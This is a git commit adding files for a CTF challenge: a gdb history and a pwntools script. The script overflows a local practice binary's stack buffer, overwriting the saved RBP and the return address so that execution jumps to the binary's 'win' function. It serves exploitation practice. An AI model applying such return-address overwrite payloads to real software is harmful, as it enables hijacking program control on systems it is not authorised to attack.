initial commit

CTF/TryPwnMeOne/RandomMemories/.gdb_history

@@ -0,0 +1,2 @@
+vmmap
+vmmap

CTF/TryPwnMeOne/RandomMemories/test.py

@@ -0,0 +1,19 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.update(os="linux", arch="amd64", log_level="error")
+context.binary = binary = ELF("./random", checksec=False )
+
+r = process()
+gdb.attach(r)
+
+win_function_address = binary.symbols["win"]
+
+payload = b"A" * 256                        # offset to the RBP
+payload += b"B" * 8                         # overwrite the RBP
+payload += p64(win_function_address)        # address of the win function
+
+r.recvuntil(b"Return to where? : \n")
+r.sendline(payload)
+r.recvuntil(b"ok, let's go!\n\n")
+r.interactive()